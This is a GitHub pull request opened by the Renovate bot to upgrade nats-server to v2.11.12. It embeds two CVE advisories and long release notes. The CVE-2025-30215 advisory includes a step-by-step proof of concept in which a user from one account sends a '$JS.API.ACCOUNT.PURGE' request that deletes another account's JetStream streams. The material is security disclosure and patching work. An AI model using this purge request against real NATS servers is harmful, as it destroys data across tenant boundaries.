
test: update module github.com/nats-io/nats-server/v2 to v2.11.12 [security] #76

Open
renovate[bot] wants to merge 1 commit into main from
renovate/go-github.com-nats-io-nats-server-v2-vulnerability

Conversation


@renovate renovate bot commented Apr 15, 2025

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package: github.com/nats-io/nats-server/v2
Change: v2.10.17 → v2.11.12

GitHub Vulnerability Alerts

CVE-2025-30215

Advisory

The management of JetStream assets happens with messages in the $JS. subject namespace in the system account; this is partially exposed into regular accounts to allow account holders to manage their assets.

Some of the JS API requests were missing access controls, allowing any user with JS management permissions in any account to perform certain administrative actions on any JS asset in any other account. At least one of the unprotected APIs allows for data destruction. None of the affected APIs allow disclosing stream contents.

Affected versions

NATS Server:

  • Version 2 from v2.2.0 onwards, prior to v2.11.1 or v2.10.27

Original Report

(Lightly edited to confirm some supposition and in the summary to use past tense)

Summary

nats-server did not include authorization checks on 4 separate admin-level JetStream APIs: account purge, server remove, account stream move, and account stream cancel-move.

In all cases, the APIs were not properly restricted to system-account users. Instead, any authorized user could execute them, including across account boundaries, as long as that user merely had permission to publish on $JS.>.

Only the first appears to be of the highest severity. All are included in this single report because they likely share the same underlying root cause.

Reproduction of the ACCOUNT.PURGE case is below. The others are like it.

Details & Impact

Issue 1: $JS.API.ACCOUNT.PURGE.*

Any user may perform an account purge of any other account (including their own).

Risk: total destruction of JetStream configuration and data.

Issue 2: $JS.API.SERVER.REMOVE

Any user may remove servers from JetStream clusters.

Risk: Loss of data redundancy, reduction of service quality.

Issue 3: $JS.API.ACCOUNT.STREAM.MOVE.*.* and CANCEL_MOVE

Any user may cause streams to be moved between servers.

Risk: loss of control of data provenance, reduced service quality during move, enumeration of account and/or stream names.

Similarly for $JS.API.ACCOUNT.STREAM.CANCEL_MOVE.*.*

Mitigations

It appears that users without permission to publish on $JS.API.ACCOUNT.> or $JS.API.SERVER.> are unable to execute the above APIs.

Unfortunately, in many configurations, an 'admin' user for a single account will be given permissions for $JS.> (or simply >), which allows the improper access to the system APIs above.
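
As an illustration of the mitigation above (a hypothetical config sketch, not taken from the advisory; the account and user names are placeholders), an account 'admin' user can keep broad publish rights while explicitly denying the system-level subjects involved:

```conf
accounts: {
  'TEST': {
    jetstream: true,
    users: [{
      user: 'admin', password: 'admin',
      permissions: {
        publish: {
          # broad access for normal stream/consumer management...
          allow: ['>'],
          # ...but deny the subjects abused by the issues above
          deny: ['$JS.API.ACCOUNT.>', '$JS.API.SERVER.>']
        }
      }
    }]
  }
}
```

With a configuration along these lines, the admin user retains ordinary JetStream management in its own account but cannot reach the purge, server-remove, or stream-move APIs.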

Scope of impact

Issues 1 and 3 both cross boundaries between accounts, violating promised account isolation. All three allow system-level access to non-system-account users.

While I cannot speak to what authz configurations are actually found in the wild, per the discussion in Mitigations above, it seems likely that at least some configurations are vulnerable.

Additional notes

It appears that $JS.API.META.LEADER.STEPDOWN does properly restrict to system account users. As such, this may be a pattern for how to properly authorize these other APIs.

PoC

Environment

Tested with:
nats-server 2.10.26 (installed via homebrew)
nats cli 0.1.6 (installed via homebrew)
macOS 13.7.4

Reproduction steps

$ nats-server --version
nats-server: v2.10.26

$ nats --version
0.1.6

$ cat nats-server.conf
listen: '0.0.0.0:4233'
jetstream: {
  store_dir: './tmp'
}
accounts: {
  '$SYS': {
    users: [{user: 'sys', password: 'sys'}]
  },
  'TEST': {
    jetstream: true,
    users: [{user: 'a', password: 'a'}]
  },
  'TEST2': {
    jetstream: true,
    users: [{user: 'b', password: 'b'}]
  }
}

$ nats-server -c ./nats-server.conf
...
[90608] 2025/03/02 11:43:18.494663 [INF] Using configuration file: ./nats-server.conf
...
[90608] 2025/03/02 11:43:18.496395 [INF] Listening for client connections on 0.0.0.0:4233
...

# Authentication is effectively enabled by the server:
$ nats -s nats://localhost:4233 account info
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user sys --password wrong
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user a --password wrong
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user b --password wrong
nats: error: setup failed: nats: Authorization Violation

# Valid credentials work, and users properly matched to accounts:
$ nats -s nats://localhost:4233 account info --user sys --password sys
Account Information
                      User: sys
                   Account: $SYS
...

$ nats -s nats://localhost:4233 account info --user a --password a
Account Information
                           User: a
                        Account: TEST
...

$ nats -s nats://localhost:4233 account info --user b --password b
Account Information
                           User: b
                        Account: TEST2
...

# Add a stream and messages to account TEST (user 'a'):
$ nats -s nats://localhost:4233 --user a --password a stream add stream1 --subjects s1 --storage file --defaults
Stream stream1 was created
...

$ nats -s nats://localhost:4233 --user a --password a publish s1 --count 3 "msg "
11:50:05 Published 5 bytes to "s1"
11:50:05 Published 5 bytes to "s1"
11:50:05 Published 5 bytes to "s1"

# Messages are correctly persisted on account TEST, and not on TEST2:
$ nats -s nats://localhost:4233 --user a --password a stream ls
╭───────────────────────────────────────────────────────────────────────────────╮
│                                    Streams                                    │
├─────────┬─────────────┬─────────────────────┬──────────┬───────┬──────────────┤
│ Name    │ Description │ Created             │ Messages │ Size  │ Last Message │
├─────────┼─────────────┼─────────────────────┼──────────┼───────┼──────────────┤
│ stream1 │             │ 2025-03-02 11:48:49 │ 3        │ 111 B │ 46.01s       │
╰─────────┴─────────────┴─────────────────────┴──────────┴───────┴──────────────╯

$ nats -s nats://localhost:4233 --user b --password b stream ls
No Streams defined

$ du -h tmp/jetstream
  0B	tmp/jetstream/TEST/streams/stream1/obs
8.0K	tmp/jetstream/TEST/streams/stream1/msgs
 16K	tmp/jetstream/TEST/streams/stream1
 16K	tmp/jetstream/TEST/streams
 16K	tmp/jetstream/TEST
 16K	tmp/jetstream

# User b (account TEST2) sends a PURGE command for account TEST (user a).

# According to the source comments, user b shouldn't even be able to purge its own account, much less another one.
$ nats -s nats://localhost:4233 --user b --password b request '$JS.API.ACCOUNT.PURGE.TEST' ''
11:54:50 Sending request on "$JS.API.ACCOUNT.PURGE.TEST"
11:54:50 Received with rtt 1.528042ms
{"type":"io.nats.jetstream.api.v1.account_purge_response","initiated":true}

# From nats-server in response to the purge request:
[90608] 2025/03/02 11:54:50.277144 [INF] Purge request for account TEST (streams: 1, hasAccount: true)

# And indeed, the stream data is gone on account TEST:
$ du -h tmp/jetstream
  0B	tmp/jetstream

$ nats -s nats://localhost:4233 --user a --password a stream ls
No Streams defined

CVE-2026-27571

Impact

NATS messages received over WebSockets may be compressed using the negotiated WebSocket compression. The implementation bounded the size of a NATS message, but it did not independently bound the memory consumed by the intermediate stream while constructing a message, which might then fail size validation anyway.

An attacker can use a compression bomb to cause excessive memory consumption, often resulting in the operating system terminating the server process.

The use of compression is negotiated before authentication, so this does not require valid NATS credentials to exploit.

The fix bounds the decompression so that it fails as soon as the message is too large, instead of continuing.

Patches

This was released in nats-server without being highlighted as a security issue. It should have been; this was an oversight. Per the NATS security policy, because exploitation does not require a valid user, it is CVE-worthy.

This was fixed in the v2.11 series with v2.11.12 and in the v2.12 series with v2.12.3.

Workarounds

This only affects deployments which use WebSockets and which expose the network port to untrusted endpoints.
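
As a sketch of such a workaround (hypothetical values; check the nats-server configuration reference before relying on any of these options), the websocket listener can be bound to a trusted interface until the server is upgraded, and WebSocket compression can be left disabled so the vulnerable negotiation never happens:

```conf
websocket {
  host: '127.0.0.1'   # expose only to trusted local clients
  port: 8443
  compression: false  # do not negotiate permessage-deflate
  no_tls: true        # TLS assumed to be terminated elsewhere in this sketch
}
```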

References

This was reported to the NATS maintainers by Pavel Kohout of Aisle Research (www.aisle.com).


Release Notes

nats-io/nats-server (github.com/nats-io/nats-server/v2)

v2.11.12

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
Dependencies
  • github.com/nats-io/nkeys v0.4.12 (#​7578)
  • github.com/antithesishq/antithesis-sdk-go v0.5.0-default-no-op (#​7604)
  • github.com/klauspost/compress v1.18.3 (#​7736)
  • golang.org/x/crypto v0.47.0 (#​7736)
  • golang.org/x/sys v0.40.0 (#​7736)
  • github.com/google/go-tpm v0.9.8 (#​7696)
  • github.com/nats-io/nats.go v1.48.0 (#​7696)
Added

General

  • Added WebSocket-specific ping interval configuration with ping_interval in the websocket block (#​7614)

Monitoring

  • Added tls_cert_not_after to the varz monitoring endpoint for showing when TLS certificates are due to expire (#​7709)
Improved

JetStream

  • The scan for the last sourced message sequence when setting up a subject-filtered source is now considerably faster (#​7553)
  • Consumer interest checks on interest-based streams are now significantly faster when there are large gaps in interest (#​7656)
  • Creating consumer file stores no longer contends on the stream lock, improving consumer create performance on heavily loaded streams (#​7700)
  • Recalculating num pending with updated filter subjects no longer gathers and sorts the subject filter list twice (#​7772)
  • Switching to interest-based retention will now remove no-interest messages from the head of the stream (#​7766)

MQTT

  • Retained messages will now work correctly even when sourced from a different account with a subject transform (#​7636)
Fixed

General

  • WebSocket connections will now correctly limit the buffer size during decompression (#​7625, thanks to Pavel Kohout at Aisle Research)
  • The config parser now correctly detects and errors on self-referencing environment variables (#​7737)
  • Internal functions for handling headers should no longer corrupt message bodies if appended (#​7752)

JetStream

  • A protocol error caused by an invalid transform of acknowledgement reply subjects when originating from a gateway connection has been fixed (#​7579)
  • The meta layer will now only respond to peer remove requests after quorum has been reached (#​7581)
  • Invalid subject filters containing non-terminating full wildcard no longer produce unexpected matches (#​7585)
  • A data race when creating a stream in clustered mode has been fixed (#​7586)
  • A panic when processing snapshots with missing nodes or assignments has been fixed (#​7588)
  • When purging whole message blocks, the subject tracking and scheduled messages are now updated correctly (#​7593)
  • The filestore will no longer unexpectedly lose writes when AsyncFlush is enabled after a process pause (#​7594)
  • The filestore now will process message removal on disk before updating accounting, which improves error handling (#​7595, #​7601)
  • Raft will no longer allow peer-removing the one remaining peer (#​7610)
  • A data race has been fixed in the stream health check (#​7619)
  • Tombstones are now correctly written for recovering the sequences after compacting or purging an almost-empty stream to seq 2 (#​7627)
  • Combining skip sequences and compactions will no longer overwrite the block at the wrong offset, correcting a corrupt record state error (#​7627)
  • Compactions that reclaim over half of the available space now use an atomic write to avoid losing messages if killed (#​7627)
  • Filestore compaction should no longer result in no idx present cache errors (#​7634)
  • Filestore compaction now correctly adjusts the high and low sequences for a message block, as well as cleaning up the deletion map accordingly (#​7634)
  • Potential stream desyncs that could happen during stream snapshotting have been fixed (#​7655)
  • Raft will no longer allow multiple membership changes to take place concurrently (#​7565, #​7609)
  • Raft will no longer count responses from peer-removed nodes towards quorum (#​7589)
  • Raft quorum counting has been refactored so the implicit leader ack is now only counted if still a part of the membership (#​7600)
  • Raft now writes the peer state immediately when handling a peer-remove to ensure the removed peers cannot unexpectedly reappear after a restart (#​7602)
  • Add peer operations to Raft can no longer result in disjoint majorities (#​7632)
  • Raft groups should no longer readmit a previously removed peer if a heartbeat occurs between the peer removal and the leadership transfer (#​7649)
  • Raft single node elections now transition into leader state correctly (#​7642)
  • R1 streams will no longer incorrectly drift last sequence when exceeding limits (#​7658)
  • Deleted streams are no longer wrongfully revived if stalled on an upper-layer catchup (#​7668)
  • A panic that could happen when receiving a shutdown signal while JetStream is still starting up has been fixed (#​7683)
  • JetStream usage stats now correctly reflect purged whole blocks when optimising large purges (#​7685)
  • Recovering JetStream encryption keys now happens independently of the stream index recovery, fixing some cases where the key could be reset unexpectedly if the index is rebuilt (#​7678)
  • Non-replicated file-based consumers now detect corrupted state on disk and are deleted automatically (#​7691)
  • Raft no longer allows a repeat vote for the same term after a stepdown or leadership transfer (#​7698)
  • Replicated consumers are no longer incorrectly deleted if they become leader just as JetStream is about to shut down (#​7699)
  • Fixed an issue where a single truncated block could prevent storing new messages in the filestore (#​7704)
  • Fixed a concurrent map iteration/write panic that could occur on WorkQueue streams during partitioning (#​7708)
  • Fixed a deadlock that could occur on shutdown when adding streams (#​7710)
  • A data race on mirror consumers has been fixed (#​7716)
  • JetStream no longer leaks subscriptions in a cluster when a stream import/export is set up that overlaps the $JS.> namespace (#​7720)
  • The filestore will no longer waste CPU time rebuilding subject state for WALs (#​7721)
  • Configuring cluster_traffic in config mode has been fixed (#​7723)
  • Subject intersection no longer misses certain subjects with specific patterns of overlapping filters, which could affect consumers, num pending calculations etc (#​7728, #​7741, #​7744, #​7745)
  • Multi-filtered next message lookups in the filestore can now skip blocks when faster to do so (#​7750)
  • The binary search for start times now handles deleted messages correctly (#​7751)
  • Consumer updates will now only recalculate num pending when the filter subjects are changed (#​7753)
  • Consumers on replicated interest or workqueue streams should no longer lose interest or cause desyncs after having their filter subjects updated (#​7773)
  • Interest-based streams will no longer start more check interest state goroutines when there are existing running ones (#​7769)

MQTT

  • The maximum payload size is now correctly enforced for MQTT clients (#​7555, thanks to @​yixianOu)
  • Fixed a panic that could occur when reloading config if the user did not have permission to access retained messages (#​7596)
  • Fixed account mapping for JetStream API requests when traversing non-JetStream-enabled servers (#​7598)
  • QoS0 messages are now mapped correctly across account imports/exports with subject mappings (#​7605)
  • Loading retained messages no longer fails after restarting due to last sequence checks (#​7616)
  • A bug which could corrupt retained messages in clustered deployments has been fixed (#​7622)
  • Permissions to $MQTT. subscriptions are now handled implicitly, with the exception of deny ACLs which still permit restriction (#​7637)
  • A bug where QoS2 messages could not be retrieved after a server restart has been fixed (#​7643)
Complete Changes

v2.11.11

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
Dependencies
Added

JetStream

  • Added meta_compact and meta_compact_size, advanced JetStream config options to control how many log entries must be present in the metalayer log before snapshotting and compaction takes place (#​7484, #​7521)
  • Added write_timeout option for clients, routes, gateways and leafnodes which controls the behaviour on reaching the write_deadline, values can be default, retry or close (#​7513)

Monitoring

  • Meta cluster snapshot statistics have been added to the /jsz endpoint (#​7524)
  • The /jsz endpoint can now show direct consumers with the direct-consumers=true query parameter (#​7543)
Improved

General

  • Binary stream snapshots are now preferred by default for nodes on new route connections (#​7479)
  • Reduced allocations in the sublist and subject transforms (#​7519)

JetStream

  • Improved the logging for observer mode (#​7433)
  • Improved the performance of enforcing max_bytes and max_msgs limits (#​7455)
  • Streams and consumers will no longer unnecessarily snapshot when being removed or scaling down (#​7495)
  • Streams are now loaded in parallel when enabling JetStream, often reducing the time it takes to start up the server (#​7482)
  • Stream catchups will now use delete ranges more aggressively, speeding up catchups of large streams with many interior deletes (#​7512)
  • Streams with subject transforms can now implicitly republish based on those transforms by configuring > for both republish source and destination (#​7515)
  • A race condition where subscriptions may not be set up before catchup requests are sent after a leader change has been fixed (#​7518)
  • JetStream recovery parallelism now matches the I/O gated semaphore (#​7526)
  • Reduced heap allocations in hash checks (#​7539)
  • Healthchecks now correctly report when streams are catching up, instead of showing them as unhealthy (#​7535)
  • Improve interest detection when consumers are created or deleted across different servers (#​7440)

Monitoring

  • The jsz monitoring endpoint can now report leader counts (#​7429)
Fixed

General

  • When using message tracing, header corruption when setting the hop header has been fixed (#​7443)
  • Shutting down a server using lame-duck mode should no longer result in max connection exceeded errors (#​7527)

JetStream

  • Race conditions and potential panics fixed in the handling of some JetStream API handlers (#​7380)
  • The filestore no longer loses tombstones when using secure erase (#​7384)
  • The filestore no longer loses the last sequence when recovering blocks containing only tombstones (#​7384)
  • The filestore now correctly cleans up empty blocks when selecting the next first block (#​7384)
  • The filestore now correctly obeys sync_always for writing TTL and scheduling state files (#​7385)
  • Fixed a data race on a wait group when mirroring streams (#​7395)
  • Skipped message sequences are now checked for ordering before apply, fixing a potential stream desync on catchups (#​7400)
  • Skipped message sequences now correctly detect gaps from erased message slots, fixing potential cache issues, slow reads and issues with catchups (#​7399, #​7401)
  • Raft groups now report peer activity more consistently, fixing some cases where asset info and monitoring endpoints may report misleading values after leader changes (#​7402)
  • Raft groups will no longer permit truncations from unexpected catchup entries if the catchup is completed (#​7424)
  • The filestore will now correctly release locks when erasing messages returns an error (#​7431)
  • Caches will now no longer expire unnecessarily when re-reading the same sequences multiple times in first-matching code paths (#​7435)
  • A couple of issues related to header handling have been fixed (#​7465)
  • No-wait requests now return a 400 No Messages response correctly if the stream is empty (#​7466)
  • Raft groups will now only report leadership status after a no-op entry on recovery (#​7460)
  • Fixed a race condition in the filestore that could happen between storing messages and shutting down (#​7496)
  • A panic that could occur when recovering streams in parallel has been fixed (#​7503)
  • An off-by-one when detecting holes at the end of a filestore block has been fixed (#​7508)
  • Writing skip message records in the filestore no longer releases and reacquires the lock unnecessarily (#​7508)
  • Fixed a bug on metalayer recovery where stream and consumer monitor goroutines for recreated assets would run with the wrong Raft group (#​7510)
  • Scaling up an asset from R1 now results in an installed snapshot, allowing recovery after restart if interrupted, avoiding a potential desync (#​7509)
  • Raft groups should no longer report no quorum incorrectly when shutting down (#​7522)
  • Consumers that existed in a metalayer snapshot but were deleted on recovery will no longer result in failing healthchecks (#​7523)
  • An off-by-one when detecting holes at the end of a filestore block has been fixed (#​7525)
  • Fixed a race condition that could happen with shutdown signals when shutting down JetStream (#​7536)
  • Fixed a deadlock that could occur when purging a stream with mismatched consumer state (#​7546)
Complete Changes

v2.11.10

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
  • 1.24.7
Dependencies
  • golang.org/x/crypto v0.42.0 (#​7320)
  • github.com/google/go-tpm v0.9.6 (#​7376)
  • github.com/nats-io/nats.go v1.46.1 (#​7377)
Improved

General

  • Statistics for gateways, routes and leaf connections are now correctly omitted from accstatsz responses if empty (#​7300)

JetStream

  • Stream assignment check has been simplified (#​7290)
  • Additional guards prevent panics when loading corrupted messages from the filestore (#​7299)
  • The store lock is no longer held while searching for TTL expiry tasks, improving performance (#​7344)
  • Removing a message from the TTL state is now faster (#​7344)
  • The filestore no longer performs heap allocations for hash checks (#​7345)
  • Meta snapshot performance for a very large number of assets has been improved after a regression in v2.11.9 (#​7350)
  • Sequence-from-timestamp lookups, such as those using opt_start_time on consumers or start_time on message get requests, now use a binary search for improved lookup performance (#​7357)
  • JetStream API requests are always handled from the worker pool, improving the semantics of the API request queue and logging when requests take too long (#​7125)
  • JetStream will no longer perform a metalayer snapshot on every stream removal request, reducing API pauses and improving meta performance (#​7373)
Fixed

General

  • Fixed the exit code when receiving a SIGTERM signal immediately after startup (#​7367)

JetStream

  • Fixed a use-after-free bug and a buffer reclamation issue in the filestore flusher (#​7295)
  • Direct get requests now correctly skip over deleted messages if the starting sequence is itself deleted (#​7291)
  • The Raft layer now strictly enforces that non-leaders cannot send append entries (#​7297)
  • The filestore now correctly handles recovering filestore blocks with out-of-order sequences from disk corruption (#​7303, #​7304)
  • The filestore now produces more useful error messages when disk corruption is detected (#​7305)
  • Removed messages with a per-message TTL are now removed from the TTL state immediately (#​7344)
  • Fixed a bug where, if TTL state was recovered on startup with subject delete markers enabled, message expiry would not start as expected (#​7344)
  • Expiring messages from the filestore no longer leaks timers and now expires at the correct time (#​7344)
  • Deleting a non-existent sequence on a stream no longer results in a cluster reset and leadership election (#​7348)
  • Subject tree intersection now correctly handles overlapping literals and partial wildcards, i.e. stream.A and stream.*.A, fixing some consumer or message get filters (#​7349)
  • A data race when checking all JetStream limits has been fixed (#​7356)
  • Raft will no longer trigger a reset of the clustered state due to a stream snapshot timeout (#​7293)
Complete Changes

v2.11.9

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
Dependencies
Improved

JetStream

  • Offline assets support (#​7158)
    • Server version 2.12 will introduce new features that would otherwise break a 2.11 server after a downgrade. The server now reports such streams/consumers as offline and unsupported, keeping the data safe while allowing operators either to delete the asset or to upgrade back to a supported version without changes to the data itself.
  • The raftz endpoint now reports the cluster traffic account (#​7186)
  • The stream info and consumer info endpoints now return leader_since (#​7189)
  • The stream info and consumer info endpoints now return system_account and traffic_account (#​7193)
  • The jsz monitoring endpoint now returns system_account and traffic_account (#​7193)
Fixed

General

  • Fix a panic that could happen at startup if building from source using non-Git version control (#​7178)
  • Fix an issue where issuing an account JWT update with a connection limit could cause older clients to be disconnected instead of newer ones (#​7181, #​7185)
  • Route connections with invalid credentials will no longer rapidly reconnect (#​7200)
  • Allow a default_sentinel JWT from a scoped signing key instead of requiring it to solely be a bearer token for auth callout (#​7217)
  • Subject interest would not always be propagated for leaf nodes when daisy chaining imports/exports (#​7255)
  • Subject interest would sometimes be lost if the leaf node is a spoke (#​7259)
  • Lowering the max connections limit should no longer result in streams losing interest (#​7258)

JetStream

  • The Nats-TTL header will now be correct if the subject delete marker TTL overwrites it (#​7177)
  • In operator mode, the cluster_traffic state for an account is now restored correctly when enabling JetStream at startup (#​7191)
  • A potential data race during a consumer create or update when reading its paused state has been fixed (#​7201)
  • A race condition that could allow creating a consumer with more replicas than the stream has been fixed (#​7202)
  • A race condition that could allow creating the same stream with different configurations has been fixed (#​7210, #​7212)
  • Raft will now correctly reject delayed entries from an old leader when catching up in the meantime (#​7209, #​7239)
  • Raft will now also limit the amount of cached in-memory entries as the leader, avoiding excessive memory usage (#​7233)
  • A potential race condition delaying shutdown if a stream/consumer monitor goroutine was not started (#​7211)
  • A benign underflow when using an infinite (-1) MaxDeliver for consumers (#​7216)
  • A potential panic to send a leader elected advisory when shutting down before completing startup (#​7246)
  • Stopping a stream should no longer wait indefinitely if the consumer monitor goroutine wasn’t stopped (#​7249)
  • Speed up stream mirroring and sourcing after a leaf node reconnects in complex topologies (#​7265)
  • Updating a stream with an empty placement will no longer incorrectly trigger a stream move (#​7222)

Tests

Complete Changes

v2.11.8

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
Dependencies
Added

General

  • Community-contributed support for building on Solaris and Illumos (#​7122, thanks to @​jwntree)
Fixed

General

  • String-to-integer parsing has been improved in various places to prevent overflows/underflows (#​7145)

JetStream

  • Fixed an incorrectly formatted log line when failing to load a block when recovering TTLs (#​7150)
  • Raft will now step down if a higher term is detected during a catchup (#​7151)
  • Raft will now more reliably ignore entries from previous/cancelled catchups that arrive late (#​7151)
  • Fix a potential panic that could happen by a division by zero when applying Raft entries (#​7151)
  • The healthcheck endpoint should no longer report transient errors for newly created or recently deleted consumers (#​7154)
  • Fix a potential panic when trying to truncate a filestore block that doesn't exist (#​7162)
  • Clean up stale index.db file when truncating so that it is not inconsistent if the truncate operation is interrupted (#​7162)
  • Fix an off-by-one problem when Raft truncates to the correct index at startup (#​7162)
  • Ephemeral consumers will always select an online server when created on a replicated stream (#​7165)

Tests

Complete Changes

v2.11.7

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
Dependencies
Added

General

  • The SubjectMatchesFilter function is now available as an exported function for embedded use (#​7051)
  • The leafz monitoring endpoint now includes the connection ID (#​7063)
  • The monitoring endpoint index page now includes the endpoint names on hover (#​7066, #​7087)
Improved

JetStream

  • Consumers with inactivity thresholds should no longer age out before processing acks (#​7107)
  • The Raft layer will no longer request store state on each apply (#​7109)
  • Tombstones in Raft log compactions will now be written asynchronously, similar to purges (#​7109)
  • When enabling per-message TTLs on a stream, existing messages with the Nats-TTL header are now scanned and processed (#​7117)
Fixed

General

  • Message header lookups with common prefixes will now return correctly in all cases, fixing a problem where the headers could be sensitive to ordering (#​7065)
  • Validate that the default_sentinel JWT is a bearer token for auth callout (#​7074)
  • The $SYS.REQ.USER.INFO endpoint should now only be answered by the local server, fixing cases where the endpoint may sometimes return without full connection details (#​7089)

JetStream

  • The Raft layer will require recovery and snapshot handling at startup before campaigning for a leadership election, fixing a situation where a node could continue with an outdated stream (#​7040)
  • The Raft log will no longer be compacted until after a snapshot is written, improving crash resilience (#​7043)
  • A race condition when shutting down Raft nodes which could result in no snapshot being written has been fixed (#​7045)
  • The behaviour of consumer pull requests that use no_wait or expires has been fixed for replicated consumers (#​7046)
  • Pull consumers with an inactive threshold will now consider pending acks when determining inactivity, preventing the consumer from being deleted while messages are being processed (#​7052)
  • Push consumers will now correctly error when trying to configure priority groups (#​7053)
  • Committed entry objects will now be correctly returned to the pool on error, reducing allocations (#​7064)
  • The time hash wheel used for per-message TTLs now correctly detects and expires messages with TTLs over an hour; previously, expiry could take up to double the expected time (#​7070)
  • A potential panic when selecting message blocks during TTL recovery has been fixed (#​7072)
  • A KV purge operation with subject delete markers configured will no longer leave behind a redundant extra delete marker (#​7026)
  • Raft will now correctly attempt to truncate back to a snapshot if applies were not caught up instead of resetting the entire log (#​7095)
  • Store cipher conversion will now work correctly when combined with store compression (#​7099)
  • Truncate and erase operations in the filestore should now be consistent after a hard kill (#​7100)
  • When a filestore message block is deleted and an unclean shutdown results in a stale index.db, the deleted blocks are now correctly marked as lost data and the index is rebuilt (#​7123)
  • Fixed a potential underflow that could happen when modifying max_bytes reservations (#​7131)
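For context on the no_wait and expires pull behaviours mentioned in the fixes above: a pull request is a JSON payload published to the consumer's next-message API subject, `$JS.API.CONSUMER.MSG.NEXT.<stream>.<consumer>`. A hedged sketch of such a payload (the field values are illustrative; expires is expressed in nanoseconds):

```json
{
  "batch": 10,
  "expires": 30000000000,
  "no_wait": false
}
```

With no_wait set to true, the server responds immediately when no messages are pending instead of holding the request open until expires elapses.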

Tests

Complete Changes

v2.11.6

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
  • 1.24.4
Improved

JetStream

  • Sources will no longer update their last seen timestamp when stalled, making it clearer how long it has been since the last contact (#​7013)
  • Overall consumer performance has been improved by reducing allocations and improving the num pending calculation (#​7022)
Fixed

General

  • The subsz monitoring endpoint now returns the correct total for subscription details, aligning behaviour with other endpoints for pagination (#​7009)

JetStream

  • Fixed a bug where filestore encryption could corrupt a message block if a write took place before a read after restarting the server (#​7008)
  • Fixed a performance regression introduced in v2.11.0 which could result in abnormally low throughput from filtered consumers and higher GC pressure (#​7015)
  • Healthchecks will no longer produce unexpected monitor goroutine warnings when a clustered stream is restored from a snapshot (#​7019)
  • A race condition that could result in removed streams incorrectly reappearing has been fixed (#​7025)
  • The reserved_memory and reserved_storage statistics will no longer underflow when no limits are set (#​7024)
Complete Changes

v2.11.5

Compare Source

Changelog

Refer to the 2.11 Upgrade Guide for backwards compatibility notes with 2.10.x.

Go Version
Dependencies
  • github.com/nats-io/nats.go v1.43.0 (#​6956)
  • golang.org/x/crypto v0.39.0 (#​6956)
  • golang.org/x/time v0.12.0 (#​6956)
Improved

General

  • The connz monitoring endpoint now includes leafnode connections (#​6949)
  • The accstatsz monitoring endpoint now contains leafnode, route and gateway connection stats (#​6967)

JetStream

  • Sourcing and mirroring should now resync more quickly when sourcing over leafnodes after a connection failure (#​6981)
  • Reduced lock contention when reporting stream ingest warnings (#​6934)
  • Log lines for resetting Raft WAL state have been clarified (#​6938)
  • Determining if acks are required in interest-based streams has been optimised with fewer memory allocations (#​6990)
  • Ephemeral R1 consumers will no longer log "new consumer leader" on clustered setups, reducing log noise when watchers etc. are in use (#​7003)
Fixed

General

  • Leafnodes with restrictive permissions can now route replies correctly when the message originates from a supercluster (#​6931)
  • Memory usage is now reported correctly on Linux systems with huge pages enabled (#​7006)

JetStream

  • Updating the AllowMsgTTL setting on a stream will now take effect correctly (#​6922)
  • A potential deadlock when purging stream consumers has been fixed (#​6933)
  • A race condition that could prevent stream snapshots on shutdown has been fixed (#​6942)

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate
Contributor Author

renovate bot commented Apr 15, 2025

ℹ️ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 10 additional dependencies were updated
  • The go directive was updated for compatibility reasons

Details:

| Package | Change |
| --- | --- |
| go | 1.22 -> 1.23.0 |
| github.com/nats-io/nats.go | v1.36.0 -> v1.39.1 |
| github.com/klauspost/compress | v1.17.9 -> v1.18.0 |
| github.com/minio/highwayhash | v1.0.2 -> v1.0.3 |
| github.com/nats-io/jwt/v2 | v2.5.7 -> v2.7.3 |
| github.com/nats-io/nkeys | v0.4.7 -> v0.4.10 |
| go.uber.org/automaxprocs | v1.5.3 -> v1.6.0 |
| golang.org/x/crypto | v0.24.0 -> v0.34.0 |
| golang.org/x/sys | v0.21.0 -> v0.30.0 |
| golang.org/x/text | v0.16.0 -> v0.22.0 |
| golang.org/x/time | v0.5.0 -> v0.10.0 |
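The go directive change listed above corresponds to a one-line edit near the top of go.mod. A sketch of the resulting file header (the module path is hypothetical):

```
module example.com/myrepo

go 1.23.0
```

Renovate bumps this directive only when a dependency in the update requires a newer minimum Go toolchain than the module currently declares.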

@codecov

codecov bot commented Apr 15, 2025

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 54.81%. Comparing base (3cf2082) to head (2765e0c).

Additional details and impacted files
@@           Coverage Diff           @@
##             main      #76   +/-   ##
=======================================
  Coverage   54.81%   54.81%           
=======================================
  Files          25       25           
  Lines        1609     1609           
=======================================
  Hits          882      882           
  Misses        630      630           
  Partials       97       97           

☔ View full report in Codecov by Sentry.


@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 3cb83fd to 1dd0113 Compare May 7, 2025 11:02
@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 1dd0113 to 35725fc Compare August 10, 2025 14:04
@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 35725fc to 69e2624 Compare October 9, 2025 09:53
@renovate
Contributor Author

